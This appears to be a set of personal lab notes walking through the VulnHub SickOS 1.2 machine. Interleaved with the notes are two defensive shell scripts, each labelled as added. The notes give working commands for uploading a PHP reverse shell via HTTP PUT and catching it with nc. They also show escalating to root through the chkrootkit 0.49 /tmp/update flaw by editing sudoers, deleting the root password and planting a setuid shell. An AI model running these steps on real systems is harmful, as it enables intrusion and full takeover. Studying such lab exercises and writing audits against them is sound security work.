walk thru
Notes :
1. https://github.com/zionspike/vulnhub-writeup/blob/master/sick0s%201.2/kapi-note.md
2. https://wg135.github.io/blog/2016/05/31/vulhub-sickos1-dot-2/
Notes :
- port 80 is lighttpd 1.4.28
- OpenSSH 5.9p1 Debian 5ubuntu1.8
- PHP 5.3.10
2) dirb shows a /test web folder & ~sys~ (getting 403 Forbidden)
3) curl shows the /test folder allows PUT (from the OPTIONS response), so upload a reverse shell with PUT:
curl --upload-file php-reverse-shell.txt -v --url http://192.168.159.132/test/reverse_shell.php -0 --http1.0
* Trying 192.168.159.132...
or nmap -p80 192.168.79.180 --script http-put --script-args http-put.url='/test/shell.php',http-put.file='shell.php'
4) Run nc on Kali and point your browser to the php file:
nc -nvlp 443
5) This gets you a reverse shell.
6) Tried to copy the privshell file using the same process and also ran nc to transfer the file; both didn't work.
7. Looking around, found chkrootkit under cron.daily [ls -l /etc/cron.daily].
8. searchsploit for chkrootkit shows one vulnerability applicable to version 0.49 [https://www.exploit-db.com/exploits/33899/].
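A defender-side check for the PUT exposure that step 3 relies on, added here as an example (it is not from these notes or the linked writeups): it parses the Allow header of an HTTP OPTIONS response, the live variant only sends OPTIONS so nothing is written to the server, and the function names and sample responses are constructed for illustration.

```shell
#!/bin/sh
# Defender check for step 3: does a web directory advertise write methods?
# Added example, not from the original notes. Function names and the sample
# responses below are constructed for illustration.

# write_methods_in_allow RESPONSE: print write-capable methods listed in the
# Allow header of a raw HTTP response, one per line; true if any are found.
write_methods_in_allow() {
    printf '%s\n' "$1" | tr -d '\r' \
      | awk -F': *' 'tolower($1) == "allow" { print $2 }' \
      | tr ',' '\n' | tr -d ' ' \
      | grep -E '^(PUT|DELETE|MOVE|COPY|MKCOL|PROPPATCH)$'
}

# put_exposed URL: true when the server allows PUT or another write method
# on URL. Only OPTIONS is sent, so nothing is written to the target.
put_exposed() {
    write_methods_in_allow "$(curl -s -i -X OPTIONS --max-time 10 "$1")"
}

# Constructed sample responses (not captured from the VM).
SAMPLE_WRITABLE='HTTP/1.1 200 OK
Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
Content-Length: 0'
SAMPLE_READONLY='HTTP/1.1 200 OK
Allow: GET, HEAD, OPTIONS
Content-Length: 0'
```

Run `put_exposed http://host/test/` against your own server; a non-empty result means the directory accepts uploads and the web server configuration needs tightening.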
9. Run "dpkg -l | grep chkrootkit" or "chkrootkit -V" to see the version of chkrootkit installed on the victim:
/var/www/test/>chkrootkit -V
chkrootkit version 0.49
10. Check the searchsploit entry for the details of the vulnerability:
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
This should give my www-data account sudo rights without a password :)
...Not sure what each does
Also need to change the permissions on the update file with chmod 777 and wait:
Run the run-parts command to execute the cron job now.
ls -al /etc/sudoers
try:
sudo su
Instead of the echo & chmod command, I created an update script to remove the root password. Here is the script:
$ echo 'passwd --delete root' > /tmp/update
$ chmod 777 /tmp/update
Run run-parts to run the cron job.
When I ran su root, I was getting "Authentication failure", but I was able to log in on the VM console.
Then I tried "sudo -i", which gave me root access:
-i, --login
Run the shell specified by the target user's password database entry as a login shell. This means that login-specific resource files such as .profile, .bash_profile or .login will be read by the shell. If a command is specified, it is passed to the shell for execution via the shell's -c option. If no command is specified, an interactive shell is executed. sudo attempts to change to that user's home directory before running the shell.
or try
option b: run a file as root [source: http://jhosssecurity.blogspot.co.uk/2016/05/sickos-12-vulnhub.html]
or option c: use the Metasploit chkrootkit module [https://www.gknsb.com/2016/05/sickos-12-writeup.html]
11. chkrootkit Vulnerability
The vulnerability in chkrootkit requires that you create an executable file called update within the /tmp directory of the server. When the cron job is run, the executable will be run as root. This was probably my biggest hangup when working through this machine. I tried many different executables before realizing that I knew the file name and location of the object I wanted. Therefore, I created a simple executable bash script to copy the file to the /tmp directory and change its permissions to where all users could read it.
I had to remember to chmod +x update in order to allow the file to be run by chkrootkit.
Since the cron job was only run daily, I used a simple command to make it run now. This run-parts command asked for a password for some parts of the job, but after skipping past entering the password, the job was able to finish.
At the end, my file was sitting in the tmp directory and I was able to open it as www-data.
or option d: create a little, stupid simple program that sets the setgid and setuid and then spawns a shell. [http://ch3rn0byl.com/sickos-1-2-walkthrough/]
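A host-side audit for the conditions that steps 7 to 10 rely on, added here as an example that is not part of these notes or the linked writeups: it flags a chkrootkit banner of 0.49 or older, a planted /tmp/update file, and a sudoers file that is either not mode 0440 or carries a NOPASSWD rule for www-data. The function names and the audit_host wrapper are my own, and version parsing assumes the "chkrootkit version 0.49" banner format shown above.

```shell
#!/bin/sh
# Host-side audit for what steps 7-10 rely on: chkrootkit 0.49 or older run
# from cron.daily (exploit-db 33899), a planted /tmp/update trigger, and a
# tampered /etc/sudoers. Added example, not from the notes; names are mine.

# ver_le A B: true when dotted version A <= B, compared field by field.
ver_le() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        n = split(a, x, "."); m = split(b, y, ".")
        for (i = 1; i <= (n > m ? n : m); i++) {
            if (x[i] + 0 < y[i] + 0) exit 0
            if (x[i] + 0 > y[i] + 0) exit 1
        }
        exit 0 }'
}

# chkrootkit_is_vulnerable BANNER: true when a "chkrootkit -V" banner reports
# 0.49 or older (0.50 stopped running /tmp/update as root from the cron job).
chkrootkit_is_vulnerable() {
    ver=$(printf '%s\n' "$1" | sed -n 's/.*version \([0-9][0-9.]*\).*/\1/p')
    [ -n "$ver" ] || return 2        # unparseable banner: unknown, not "safe"
    ver_le "$ver" "0.49"
}

# tmp_update_planted [DIR]: true when DIR/update exists; warns when it is
# executable, because the daily chkrootkit job would run it as root.
tmp_update_planted() {
    f="${1:-/tmp}/update"
    [ -e "$f" ] || return 1
    [ -x "$f" ] && echo "WARNING: executable $f would run as root via cron.daily"
    return 0
}

# sudoers_nopasswd_entries FILE: print NOPASSWD rules for www-data (the notes
# above append "www-data ALL=NOPASSWD: ALL"); true if any exist.
sudoers_nopasswd_entries() {
    grep -E '^[[:space:]]*www-data[[:space:]].*NOPASSWD' "$1"
}

# sudoers_mode_ok FILE: /etc/sudoers should stay 0440; the notes chmod it 777.
sudoers_mode_ok() {
    [ "$(stat -c '%a' "$1")" = "440" ]
}

# audit_host: run every check against the live system (call it explicitly).
audit_host() {
    command -v chkrootkit >/dev/null && chkrootkit_is_vulnerable "$(chkrootkit -V 2>&1)" \
        && echo "chkrootkit is 0.49 or older: vulnerable"
    tmp_update_planted /tmp && echo "/tmp/update is present"
    sudoers_nopasswd_entries /etc/sudoers
    sudoers_mode_ok /etc/sudoers || echo "/etc/sudoers mode is not 0440"
}
```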
12. First thing I did was create a little, stupid simple program that sets the setgid and setuid and then spawns a shell. After this, I take advantage of update to set root ownership of this simple, yet deadly binary that will allow me to run it >:D
If all goes well, I will now have a simple tool of mass destruction waiting for me in /tmp.
Now, after waiting a minute or so…it’s time to check!
Great success!!